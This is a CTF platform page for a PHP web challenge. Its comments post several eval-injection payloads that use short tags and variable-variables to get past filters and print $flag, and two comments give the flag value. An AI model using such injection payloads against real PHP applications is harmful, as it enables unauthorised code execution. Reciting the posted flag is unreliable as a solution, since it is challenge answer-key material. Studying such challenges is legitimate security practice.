闪电十六鞭WEB 未解决

分数: 30 金币: 5
题目作者: harry
一  血: dzfdxf2
一血奖励: 3金币
解  决: 2320
提  示: 闪电十六鞭
描  述:
flag{}
评论
派大星CTF 1月前

eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag

回复 0

YUMEKO 11月前

http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333

回复 0

Daniel2023 1年前

payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111

回复 0

coo1an 1年前

1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111

回复 0

110-没办法 1年前

flag{78062956}

回复 0

wxy1343 1年前

flag{78062956}

回复 0

w登临意 1年前

好难

回复 0

阿Q啊 2年前

但是不精通php不会写,就很难受,只能看别人的writeup的payload

回复 0

阿Q啊 2年前

这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!

回复 3

哎嘿嘿1314 2年前

牛皮

回复 0

WriteUp

image
Leuslu

6 金币

评分(6)

解题动态

xiaoxiaojiangshi 攻破了该题 1天前
13787026747 攻破了该题 1天前
czg9000 攻破了该题 3天前
mps11 攻破了该题 7天前
yhyyhy 攻破了该题 9天前
mushmush 攻破了该题 10天前
18244339938 攻破了该题 13天前
huaji48254 攻破了该题 22天前
tfios 攻破了该题 25天前
无122 攻破了该题 26天前
minhaf 攻破了该题 27天前
yanzhenfeng 攻破了该题 28天前
z723622533 攻破了该题 1月前
18283162726 攻破了该题 1月前
854396873 攻破了该题 1月前
drabbit 攻破了该题 1月前
1148391538 攻破了该题 1月前
PDXX 攻破了该题 1月前
tolobuick 攻破了该题 1月前
不在话下 攻破了该题 1月前
问题反馈